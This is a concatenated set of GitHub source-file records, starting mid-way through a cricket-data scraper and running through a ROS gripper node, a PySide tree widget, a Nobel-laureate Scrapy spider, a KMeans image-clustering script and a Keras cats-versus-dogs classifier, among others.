\")\r\n # Getting the Umpire Names properly\r\n try:\r\n if len(umpire[0]) == 2:\r\n parts_0 = umpire[0].split()\r\n else:\r\n parts_0 = re.findall('[A-Z][^A-Z]*',umpire[0])\r\n # print (umpire[1])\r\n parts_1 = re.findall('[A-Z][^A-Z]*',umpire[1])\r\n if len(parts_0) == 2:\r\n # print ('Field Umpires - > {},{} {}'.format(parts_0[0],parts_0[1],umpire[1]))\r\n Match_data['Field_umpire1'] = str(parts_0[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_0[1]) +\" \"+str(umpire[1])\r\n row.append(Match_data['Field_umpire2'])\r\n elif len(parts_1) == 2 and len(umpire)>=3:\r\n # print ('Field Umpires - > {} {},{} {}'.format(umpire[0],parts_1[0],parts_1[1],umpire[2]))\r\n Match_data['Field_umpire1'] = str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])+\" \"+str(umpire[2])\r\n row.append(Match_data['Field_umpire2'])\r\n else:\r\n if (parts_1[1] == 'G'):\r\n parts_1[1] = str(parts_1[1]).replace(\"G\",\"GA Pratapkumar\")\r\n # print ('Field Umpires - > {} {},{}'.format(umpire[0],parts_1[0],parts_1[1]))\r\n Match_data['Field_umpire1'] =str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])\r\n row.append(Match_data['Field_umpire2'])\r\n else:\r\n # print ('Field Umpires - > {} {},{}'.format(umpire[0],parts_1[0],parts_1[1]))\r\n Match_data['Field_umpire1'] = str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])\r\n row.append(Match_data['Field_umpire2'])\r\n except(IndexError):\r\n # print ('Field Umpires Ex - > {} {},{}'.format(umpire[0],parts_0[0],parts_0[1]))\r\n raise \r\n # Finding TV Umpires\r\n for tv_umpire in soup_class.find_all('h4',text='TV Umpires'):\r\n tv_umpire = str(tv_umpire).split('\\\"')[1]\r\n tv_umpire = int(tv_umpire)\r\n tv_umpire += 1\r\n for tv_single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(tv_umpire)}):\r\n tv_umpire = tv_single_umpire.text\r\n Match_data['TV_umpire'] = tv_umpire\r\n row.append(Match_data['TV_umpire'] )\r\n if tv_umpire == '':\r\n row.append('')\r\n # Finding Reserve upmires\r\n for reserve_umpire in soup_class.find_all('h4',text='Reserve Umpire'):\r\n reserve_umpire = str(reserve_umpire).split('\\\"')[1]\r\n reserve_umpire = int(reserve_umpire)\r\n reserve_umpire += 1\r\n for reserve_single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(reserve_umpire)}):\r\n reserve_umpire = reserve_single_umpire.text\r\n Match_data['Reserve_umpire'] = reserve_umpire\r\n row.append(Match_data['Reserve_umpire'])\r\n if reserve_umpire == '':\r\n row.append('') \r\n for referee in soup_class.find_all('h4',text='Match Referee'):\r\n referee = str(referee).split('\\\"')[1]\r\n referee = int(referee)\r\n referee += 1\r\n for match_referee in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(referee)}):\r\n referee = match_referee.text\r\n Match_data['Referee'] = referee\r\n row.append(Match_data['Referee'])\r\n if referee == '':\r\n row.append('')\r\n # Finding Overs and Run rate played by both teams\r\n if (result != 'Match abandoned without a ball bowled') :\r\n # print (\"inn\")\r\n for dat in soup_class.find_all('div', class_='cell'):\r\n # print (\"Inside Dat\")\r\n if dat.text == 'TOTAL':\r\n team1_ov = dat['data-reactid']\r\n # print (team1_ov)\r\n team1_ov = int(team1_ov)\r\n team1_ov += 1\r\n for get_overs in soup_class.find_all('div',attrs={'class':'cell','data-reactid':str(team1_ov)}):\r\n get_played_overs = get_overs.text\r\n split_comma = get_played_overs.split(\",\")\r\n rr_list.append(str(split_comma[1]).split(\")\")[0].split(\":\")[1].strip())\r\n rr_overs.append(str(split_comma[0]).split(\"(\")[1].split(\" \")[0].strip())\r\n else:\r\n rr_list = ['0','0']\r\n rr_overs = ['0.00','0.00']\r\n Match_data['Team1_score'] = \"0\"\r\n Match_data['Team2_score'] = \"0\"\r\n Match_data['Player_of_match'] = None\r\n Match_data['Player_of_match_team'] = None\r\n if (result != 'No result (abandoned with a toss)') :\r\n for dat in soup_class.find_all('div', class_='cell'):\r\n if dat.text == 'TOTAL':\r\n team1_ov = dat['data-reactid']\r\n team1_ov = int(team1_ov)\r\n team1_ov += 1\r\n for get_overs in soup_class.find_all('div',attrs={'class':'cell','data-reactid':str(team1_ov)}):\r\n get_played_overs = get_overs.text\r\n split_comma = get_played_overs.split(\",\")\r\n rr_list.append(str(split_comma[1]).split(\")\")[0].split(\":\")[1].strip())\r\n rr_overs.append(str(split_comma[0]).split(\"(\")[1].split(\" \")[0].strip())\r\n else:\r\n rr_list = ['0','0']\r\n rr_overs = ['0.00','0.00']\r\n Match_data['Team1_score'] = \"0\"\r\n Match_data['Team2_score'] = \"0\"\r\n Match_data['Player_of_match'] = ''\r\n Match_data['Player_of_match_team'] = ''\r\n # Finding Toss Report\r\n for toss in soup_class.find_all('h4',text='Toss'):\r\n toss_report = str(toss).split('\\\"')[1]\r\n toss_report = int(toss_report)\r\n toss_report += 2\r\n for toss_Match_data in soup_class.find_all('span',attrs={'data-reactid':str(toss_report)}):\r\n toss = toss_Match_data.text\r\n datum = str(datum.text)\r\n contents = datum.split(\",\")\r\n venue = str(contents[1])\r\n # Venue\r\n venue = venue.split(\" \")[5]\r\n # Match Date and type\r\n date = contents[2]\r\n # Getting Season \r\n season = str(contents[2]).split(\" \")[3]\r\n # Finding overs\r\n # Data Builder \r\n Match_data['Match'] = contents[0]\r\n row.append(Match_data['Match'])\r\n Match_data['Team1'] = team1\r\n row.append(Match_data['Team1'])\r\n Match_data['Team2'] = team2\r\n row.append(Match_data['Team2'])\r\n Match_data['Team1_score'] = team1_score\r\n row.append(Match_data['Team1_score'])\r\n Match_data['Team1_overs'] = rr_overs[0]\r\n row.append(Match_data['Team1_overs'])\r\n Match_data['Team1_RR'] = rr_list[0]\r\n row.append(Match_data['Team1_RR'])\r\n Match_data['Team2_score'] = team2_score.split(\" \")[0]\r\n row.append(Match_data['Team2_score'])\r\n Match_data['Team2_overs'] = rr_overs[1]\r\n row.append(Match_data['Team2_overs'])\r\n Match_data['Team2_RR'] = rr_list[1]\r\n row.append(Match_data['Team2_RR'])\r\n Match_data['Venue'] = venue\r\n row.append( Match_data['Venue'])\r\n Match_data['Schedule'] = date\r\n row.append(Match_data['Schedule'])\r\n Match_data['Result'] = result\r\n row.append(Match_data['Result'])\r\n Match_data['Player_of_match'] = player_of_match\r\n row.append(Match_data['Player_of_match'])\r\n Match_data['Player_of_match_team'] = pom_team\r\n row.append(Match_data['Player_of_match_team'])\r\n Match_data['Toss'] = toss\r\n row.append(Match_data['Toss'])\r\n Match_data['Season'] = season\r\n row.append(Match_data['Season'])\r\n # print(Match_data['Match'])\r\n # Writes to file\r\n csv_write(row)\r\n # Re-initialization for consecutive loop, to remove cached data\r\n row.clear()\r\n rr_list.clear()\r\n rr_overs.clear()\r\n player_of_match = \"\"\r\n pom_team = \"\"\r\n reserve_umpire=\"\"\r\n referee = \"\"\r\n tv_umpire = \"\"\r\n else:\r\n pass\r\nprint (c) # Total Matches of the season\r\n","repo_name":"soumyas2017/Webscapping","sub_path":"ipl_data_prepare.py","file_name":"ipl_data_prepare.py","file_ext":"py","file_size_in_byte":17489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16107699683","text":"import sys\nimport time\nimport signal\nimport rospy\nfrom robotiq_c_model_control.msg import CModel_robot_output as GripperCmd\nfrom robotiq_c_model_control.msg import CModel_robot_input as GripperStat\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\n\n\ndef main():\n\n rospy.init_node(\"publish_finger_state\")\n\n data = [0.]\n\n def update_gripper_stat(msg):\n data[0] = msg.gPO / 255.\n\n gripper_sub = rospy.Subscriber(\"/CModelRobotInput\", GripperStat, update_gripper_stat)\n joint_state_pub = rospy.Publisher(\"joint_states\", JointState, queue_size=10)\n rate = rospy.Rate(10) # 10hz\n\n while not rospy.is_shutdown():\n state_msg = JointState()\n state_msg.header = Header()\n state_msg.header.stamp = rospy.Time.now()\n state_msg.name = [\"robotiq_85_left_knuckle_joint\"]\n state_msg.position = [data[0]]\n state_msg.velocity = []\n state_msg.effort = []\n joint_state_pub.publish(state_msg)\n rate.sleep()\n\n gripper_sub.unregister()\n joint_state_pub.unregister()\n sys.exit(0)\n\n\nmain()\n","repo_name":"ondrejbiza/fewshot","sub_path":"launch/publish_finger_state.py","file_name":"publish_finger_state.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4002304339","text":"\r\nfrom PySide import QtGui\r\nfrom PySide import QtCore\r\nfrom PySide.QtCore import Qt\r\n\r\nfrom .propertyitemmodel import PropertyItemModel\r\nfrom .baseproxymodel import BaseProxyModel\r\nfrom .basecontextmenu import BaseContextMenu\r\nfrom .basetreeview import BaseTreeView\r\nfrom .baseselectionmodel import BaseSelectionModel\r\n\r\nclass BaseTreeWidget(QtGui.QWidget):\r\n\r\n treeViewClass = BaseTreeView\r\n itemModelClass = PropertyItemModel\r\n selectModelClass = BaseSelectionModel\r\n proxyModelClass = BaseProxyModel\r\n contextMenuClass = BaseContextMenu\r\n\r\n def __init__(self, parent=None , **kwargs):\r\n super(BaseTreeWidget, self).__init__(parent)\r\n\r\n self.horizontalLayout = QtGui.QHBoxLayout(self)\r\n self.horizontalLayout.setSpacing(2)\r\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n\r\n splitter = QtGui.QSplitter(self)\r\n splitter.setOrientation(QtCore.Qt.Horizontal)\r\n splitter.setHandleWidth(3)\r\n splitter.setObjectName(\"splitter\")\r\n splitter.setChildrenCollapsible(True)\r\n\r\n treeView = self.__class__.treeViewClass(splitter)\r\n treeView.setObjectName(\"treeView\")\r\n treeView.header().setStretchLastSection(True)\r\n\r\n dataView = self.__class__.treeViewClass(splitter)\r\n dataView.setObjectName(\"dataView\")\r\n dataView.header().setStretchLastSection(False)\r\n dataView.noScrollTo = True\r\n\r\n self.horizontalLayout.addWidget(splitter)\r\n\r\n treeView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n treeView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n\r\n dataView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n dataView.setHorizontalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n dataView.setVerticalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n treeView.setVerticalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n\r\n treeVSB = treeView.verticalScrollBar()\r\n dataVSB = dataView.verticalScrollBar()\r\n\r\n treeVSB.valueChanged.connect(dataVSB.setValue)\r\n dataVSB.valueChanged.connect(treeVSB.setValue)\r\n\r\n treeView.collapsed.connect(dataView.collapse)\r\n treeView.expanded.connect(dataView.expand)\r\n\r\n treeView.collapsed.connect(treeView.recursiveCollapse)\r\n treeView.expanded.connect(treeView.recursiveExpand)\r\n\r\n# treeView.setStyleSheet(viewStyleSheet + branchStyleSheet + itemStyleSheet)\r\n# dataView.setStyleSheet(viewStyleSheet + itemStyleSheet)\r\n\r\n self.tableHScrollBar = dataView.horizontalScrollBar()\r\n\r\n #should be done once all widget in splitter was created\r\n splitter.setStretchFactor(0, 0)\r\n splitter.setStretchFactor(1, 1)\r\n\r\n self.splitter = splitter\r\n self.treeView = treeView\r\n self.dataView = dataView\r\n\r\n def setupModelData(self, metamodel, **kwargs):\r\n\r\n bProxyModel = kwargs.pop(\"useProxyModel\", True)\r\n\r\n model = self.__class__.itemModelClass(metamodel, self)\r\n\r\n if bProxyModel:\r\n\r\n proxyModel = self.__class__.proxyModelClass()\r\n proxyModel.setSourceModel(model)\r\n self.setModel(proxyModel)\r\n\r\n self.treeView.sortByColumn(0, Qt.AscendingOrder)\r\n self.treeView.setSortingEnabled(True)\r\n\r\n else:\r\n self.setModel(model)\r\n\r\n self.dataView.mainCtxMenu = self.__class__.contextMenuClass(self.dataView)\r\n if self.treeView:\r\n self.treeView.mainCtxMenu = self.__class__.contextMenuClass(self.treeView)\r\n# self.connect(self.dataView.model(), SIGNAL(\"leafAdded(QModelIndex)\"), self.treeView.expand)\r\n# else:\r\n# self.connect(self.dataView.model(), SIGNAL(\"leafAdded(QModelIndex)\"), self.dataView.expand)\r\n\r\n return\r\n\r\n def setModel(self, model):\r\n\r\n self.dataView.setModel(model)\r\n self.dataView.setSelectionModel(self.__class__.selectModelClass(model))\r\n\r\n self.dataView.setColumnHidden(0, True)\r\n\r\n if self.treeView:\r\n\r\n self.treeView.setModel(model)\r\n self.treeView.setSelectionModel(self.dataView.selectionModel())\r\n\r\n for i in range(1, self.dataView.model().columnCount()):\r\n self.treeView.setColumnHidden(i, True)\r\n\r\n #self.dataView.header().setResizeMode(0, QtGui.QHeaderView.Fixed)\r\n #self.treeView.header().setResizeMode(0, QtGui.QHeaderView.Fixed)\r\n\r\n def model(self):\r\n return self.treeView.model()\r\n\r\n def selectionModel(self):\r\n return self.treeView.selectionModel()\r\n\r\n def getSelectedLeaves(self):\r\n return self.selectionModel().selectedLeaves\r\n\r\n def refresh(self):\r\n self.treeView.model().refresh()\r\n\r\n def wasAnItemPressed(self):\r\n\r\n ret = self.treeView.wasAnItemPressed()\r\n# print self, \"wasAnItemPressed\", ret\r\n return ret\r\n\r\n def updateTableHScrollRange(self, iMin , iMax):\r\n self.tableHScrollBar.setMinimum(self.dataView.columnWidth(0))\r\n\r\n\r\n def keyPressEvent(self, keyEvent):\r\n self.dataView.keyPressEvent(keyEvent)\r\n if self.treeView:\r\n self.treeView.keyPressEvent(keyEvent)\r\n\r\n def keyReleaseEvent(self, keyEvent):\r\n self.dataView.keyReleaseEvent(keyEvent)\r\n if self.treeView:\r\n self.treeView.keyReleaseEvent(keyEvent)\r\n\r\n\r\n def expandAll(self):\r\n self.dataView.expandAll()\r\n if self.treeView:\r\n self.treeView.expandAll()\r\n\r\n def resizeColumnsToContents(self):\r\n self.dataView.resizeColumnsToContents()\r\n if self.treeView:\r\n self.treeView.resizeColumnsToContents()\r\n\r\n\r\n def setUiCategory(self, categoryKey):\r\n\r\n model = self.model()\r\n\r\n sPropertyToDisplayList = model.getPrptiesFromUiCategory(categoryKey)\r\n\r\n dataView = self.dataView\r\n treeView = self.treeView\r\n\r\n for i, sProperty in enumerate(model.propertyNames):\r\n\r\n dataView.setColumnHidden(i, sProperty not in sPropertyToDisplayList)\r\n\r\n if i == 0 and treeView:\r\n treeView.resizeColumnToContents(i)\r\n else:\r\n dataView.resizeColumnToContents(i)\r\n\r\n def parentSelected(self):\r\n\r\n model = self.dataView.model()\r\n\r\n selectedLeaves = self.dataView.selectionModel().selectedLeaves[:]\r\n if model and selectedLeaves:\r\n model.moveLeaves(selectedLeaves[:-1], selectedLeaves[-1])\r\n\r\n def unparentSelected(self):\r\n\r\n model = self.dataView.model()\r\n\r\n selectedLeaves = self.dataView.selectionModel().selectedLeaves[:]\r\n if model and selectedLeaves:\r\n\r\n for leaf in selectedLeaves:\r\n\r\n parentLeaf = leaf.parent\r\n if parentLeaf:\r\n grdParentLeaf = parentLeaf.parent\r\n if grdParentLeaf:\r\n model.moveLeaves([leaf], grdParentLeaf)\r\n\r\n\r\n def __repr__(self):\r\n\r\n try:\r\n sRepr = ('{0}( \"{1}\" )'.format(self.__class__.__name__, self.objectName()))\r\n except:\r\n sRepr = self.__class__.__module__ + \".\" + self.__class__.__name__\r\n\r\n return sRepr\r\n","repo_name":"sebcourtois/cg-pypeline-toolkit","sub_path":"pytk/core/itemviews/basetreewidget.py","file_name":"basetreewidget.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5876602187","text":"\"\"\"Test For CountdownEvent\"\"\"\n\nimport asyncio\nimport pytest\nfrom countdown_event import CountdownEvent\n\n@pytest.mark.asyncio\nasync def test_smoke():\n \"\"\"Smoke test\"\"\"\n await asyncio.sleep(1)\n assert True\n\n countdown_event = CountdownEvent()\n\n async def mock_job(sleep_time: float) -> None:\n nonlocal countdown_event\n count = countdown_event.increment()\n print(f'incremented count to {count}')\n try:\n await asyncio.sleep(sleep_time)\n finally:\n count = countdown_event.decrement()\n print(f'decremented count to {count}')\n\n tasks = [asyncio.create_task(mock_job(5)) for _ in range(5)]\n tasks.append(countdown_event.wait())\n\n await asyncio.wait(tasks)\n assert countdown_event.count == 0\n print(\"done\")\n","repo_name":"rob-blackbourn/countdown-event","sub_path":"tests/test_countdown_event.py","file_name":"test_countdown_event.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42361029059","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import NobelWinnerItem\nimport re\nBASE_URL = 'https://ja.wikipedia.org'\n\nclass NwinnerListSpiderSpider(scrapy.Spider):\n name = 'nwinner_list_spider'\n allowed_domains = ['https://ja.wikipedia.org/wiki/']\n start_urls = ['https://ja.wikipedia.org/wiki/%E5%9B%BD%E5%88%A5%E3%81%AE%E3%83%8E%E3%83%BC%E3%83%99%E3%83%AB%E8%B3%9E%E5%8F%97%E8%B3%9E%E8%80%85']\n\n custom_settings = {\n 'ITEM_PIPELINES': {'nobel_winner.pipelines.DropNonPersons': 1,\n 'nobel_winner.pipelines.MongoDBPipeline': 2},\n 'MONGODB_SERVER': 'localhost',\n 'MONGODB_PORT': 27017,\n 'MONGODB_DB': 'nobel_prize',\n 'MONGODB_COLLECTION': 'winners'\n }\n def parse(self, response):\n h4s = response.xpath('//h4')\n for h4 in h4s:\n country = h4.xpath('span[@class=\"mw-headline\"]/text()').extract()\n if country:\n winners = h4.xpath('following-sibling::ol[1]')\n for w in winners.xpath('li'):\n\n wdata = process_winner_li(w, country[0])\n\n request = scrapy.Request(\n wdata['link'],\n callback=self.parse_bio,\n dont_filter=True\n )\n request.meta['item'] = NobelWinnerItem(**wdata)\n yield request\n\n def parse_bio(self, response):\n item = response.meta['item']\n href = response.xpath('//li[@id=\"t-wikibase\"]/a/@href').extract()\n\n if href:\n request = scrapy.Request(href[0],\n callback=self.parse_wikidata,\n dont_filter=True)\n request.meta['item'] = item\n yield request\n\n\n def parse_wikidata(self, response):\n item = response.meta['item']\n prooperty_codes = [\n {'name': 'date_of_birth', 'code': 'P569'},\n {'name': 'date_of_death', 'code': 'P570'},\n {'name': 'place_of_birth', 'code': 'P19', 'link': True},\n {'name': 'place_of_death', 'code': 'P20', 'link': True},\n {'name': 'gender', 'code': 'P21', 'link': True},\n ]\n\n p_template = '//*[@id=\"{code}\"]//div[@class=\"wikibase-snakview-value wikibase-snakview-variation-valuesnak\"]{link_html}/text()'\n\n for prop in prooperty_codes:\n\n link_html = ''\n if prop.get('link'):\n link_html = '/a'\n sel = response.xpath(p_template.format(code=prop['code'], link_html=link_html))\n if sel:\n item[prop['name']] = sel[0].extract()\n\n yield item\n\n\n\n\n\ndef process_winner_li(w, country=None):\n \"\"\"受賞者の
  • タグを処理する\"\"\"\n wdata = {}\n wdata['link'] = BASE_URL + w.xpath('a/@href').extract()[0]\n text = ''.join(w.xpath('descendant-or-self::text()').extract())\n wdata['name'] = text.split('、')[0].strip()\n\n year = re.findall('\\d{4}', text) #4桁の文字列は年度である\n if year:\n wdata['year'] = int(year[0])\n else:\n wdata['year'] = 0\n print('no year')\n\n category = re.findall('文学賞|化学賞|物理学賞|生理学・医学賞|平和賞|経済学賞', text)\n if category:\n wdata['category'] = category[0]\n else:\n wdata['category'] = ''\n print('no category')\n\n if country:\n wdata['country'] = country\n wdata['born_in'] = ''\n\n wdata['text'] = text\n return wdata\n\n","repo_name":"watanta/python_javascriot_visualize","sub_path":"nobel_winner/nobel_winner/spiders/nwinner_list_spider.py","file_name":"nwinner_list_spider.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34649614221","text":"from sklearn.cluster import KMeans\nimport pickle\nimport os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nenddir = os.path.dirname(__file__)[:-4]\npath = enddir+\"zad1/dataset validation\"\nx, y, z = (50, 50, 3)\nimage_array = pickle.load((open(path, \"rb\")))\ndataset = np.ndarray(shape=(len(image_array[\"dataset validation\"]), 7500), dtype=np.float64)\nn = 0\nfor image in image_array[\"dataset validation\"]:\n tmp = cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n dataset[n] = tmp.reshape(x*y*z)\n n = n + 1\n\n\nkmeans_cluster = KMeans(verbose=1)\n\nprint(dataset.shape)\n\nkmeans_cluster.fit(dataset)\ncluster_centers = kmeans_cluster.cluster_centers_\ncluster_labels = kmeans_cluster.labels_\nimage_cluster = cluster_centers.reshape(-1, 50, 50, 3)\n\nn = 0\nlabels = [[] for i in range(8)]\nfor label in cluster_labels:\n labels[label].append(image_array[\"labels validation\"][n])\n\n n += 1\n\nn = 0\nfor label in labels:\n print(str(n) + \" label contains these fruits: \" + str(np.unique(label)))\n n += 1\n\nn = 241\nfor img in image_cluster:\n tmp = img.astype(np.float32)\n img = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n plt.subplot(n), plt.imshow(img), plt.title(\"Trieda: \" + str(n-241))\n if n < 249:\n n = n + 1\n\nplt.tight_layout()\nplt.waitforbuttonpress(300000)\nplt.close()\n","repo_name":"Eivn13/Suns","sub_path":"zad2/uloha2.py","file_name":"uloha2.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44000697124","text":"import pandas as pd\nimport csv\nfrom os.path import join\n\n\ndef create_control_totals_meta(dest_folder: str):\n \"\"\"\n Create the file containing control totals for each meta region (upper level) in the project.\n\n Parameters:\n *dest_folder*(:obj:`str`): folder containing PopulationSim population files\n \"\"\"\n\n df = pd.read_csv(join(dest_folder, \"data/control_totals_taz.csv\"))\n\n hh_list = df[[\"HHBASE\", \"HHBASE1\", \"HHBASE2\", \"HHBASE4\", \"HHBASE6\"]].sum().tolist()\n\n total_pop = (\n df.sum()[\n [\n \"POPF1\",\n \"POPF2\",\n \"POPF3\",\n \"POPF4\",\n \"POPF5\",\n \"POPF6\",\n \"POPF7\",\n \"POPF8\",\n \"POPF9\",\n \"POPF10\",\n \"POPF11\",\n \"POPF12\",\n \"POPF13\",\n \"POPF14\",\n \"POPF15\",\n \"POPF16\",\n \"POPF17\",\n \"POPF18\",\n \"POPM1\",\n \"POPM2\",\n \"POPM3\",\n \"POPM4\",\n \"POPM5\",\n \"POPM6\",\n \"POPM7\",\n \"POPM8\",\n \"POPM9\",\n \"POPM10\",\n \"POPM11\",\n \"POPM12\",\n \"POPM13\",\n \"POPM14\",\n \"POPM15\",\n \"POPM16\",\n \"POPM17\",\n \"POPM18\",\n ]\n ]\n .sum()\n .tolist()\n )\n\n hh_list.insert(0, 1)\n hh_list.insert(1, 1)\n hh_list.insert(2, total_pop)\n\n with open(join(dest_folder, \"data/control_totals_meta.csv\"), \"w\", newline=\"\") as file:\n writer = csv.writer(file, delimiter=\",\")\n writer.writerow([\"PUMA\", \"REGION\", \"POPBASE\", \"HHBASE\", \"HHSIZE1\", \"HHSIZE2\", \"HHSIZE4\", \"HHSIZE6\"])\n writer.writerow(hh_list)\n","repo_name":"AequilibraE/tradesman","sub_path":"tradesman/model_creation/synthetic_population/create_control_totals_meta.py","file_name":"create_control_totals_meta.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"70315694566","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n idx = 0\n for i in range(len(nums)):\n if nums[i] != nums[idx]:\n idx += 1\n nums[idx] = nums[i]\n return idx + 1, nums\n\n\nif __name__ == '__main__':\n nums1 = [1, 1, 2]\n nums2 = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n s = Solution()\n print(s.removeDuplicates(nums1))\n print(s.removeDuplicates(nums2))","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/双指针/26_removeDuplicates.py","file_name":"26_removeDuplicates.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13704825078","text":"import os,shutil\n\ndef mkDir(path):\n\ttry:\n\t\tos.mkdir(path)\n\t\tprint('Directory created!')\n\texcept:\n\t\tprint('Directory already exists!')\n\nmain_path = os.path.dirname(os.path.abspath(__file__)) #path to current working directory\n\ndata_path = main_path+'/Dane.nosync/catDogs'\nbase_path = main_path+'/Dane.nosync/catDogs-small'\nmkDir(base_path)\n#Dir for partial data\ntrain_path = os.path.join(base_path, 'train')\nmkDir(train_path)\ntrain_cats_path = os.path.join(train_path, 'cats')\nmkDir(train_cats_path)\ntrain_dogs_path = os.path.join(train_path, 'dogs')\nmkDir(train_dogs_path)\n\nvalidation_path = os.path.join(base_path, 'validation')\nmkDir(validation_path)\nvalidation_cats_path = os.path.join(validation_path, 'cats')\nmkDir(validation_cats_path)\nvalidation_dogs_path = os.path.join(validation_path, 'dogs')\nmkDir(validation_dogs_path)\n\ntest_path = os.path.join(base_path, 'test')\nmkDir(test_path)\ntest_cats_path = os.path.join(test_path, 'cats')\nmkDir(test_cats_path)\ntest_dogs_path = os.path.join(test_path, 'dogs')\nmkDir(test_dogs_path)\n\n#copy first 1000 cats images to train_cats\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000)] \t#format wstawia w {} 'i' do stringa\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(train_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy next 500 cats to validation_path\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000,1500)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(validation_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n#copy next 500 cats to test_cats_path\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1500,2000)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(test_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy 1000 dogs to train_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000)] \t#format wstawia w {} 'i' do stringa\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(train_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy next 500 dogs to validation_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000,1500)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(validation_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n#copy next 500 dogs to test_cats_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1500,2000)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(test_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n\n#Creating model\n\nfrom keras import models,layers\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32,(3,3), activation = 'relu', input_shape = (150,150,3) ))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(64,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(128,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(128,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation = 'relu'))\nmodel.add(layers.Dense(1, activation = 'sigmoid'))\n\nmodel.compile(optimizer = 'rmsprop' ,loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n\nprint(model.summary())\n\n#Data preprocessing (jpg->np.array) - za pomocą generatora\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n#train_dataGen = ImageDataGenerator(rescale = 1./255)\n#test_dataGen = ImageDataGenerator(rescale = 1./255)\n\ndataGen = ImageDataGenerator(rescale = 1./255)\n\ntrain_generator = dataGen.flow_from_directory(\n\ttrain_path, \n\ttarget_size =(150,150), \n\tbatch_size = 20,\n\tclass_mode = 'binary' #binarne labele\n)\n\nvalidation_generator = dataGen.flow_from_directory(\n\tvalidation_path, \n\ttarget_size =(150,150), \n\tbatch_size = 20,\n\tclass_mode = 'binary' #binarne labele\n)\n\n#Uwaga, generator niewie kiedy jest koniec danych i będzie je generował bez końca\n# dla model.fit generator steps_per_epochs (lub validation_steps) = ileDanych/generator.batch_size\n\nhistory = model.fit_generator(train_generator, steps_per_epoch = 100, epochs = 30, validation_data = validation_generator, validation_steps = 50)\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nsteps = range(1, len(acc)+1)\n\n\nimport matplotlib.pylab as 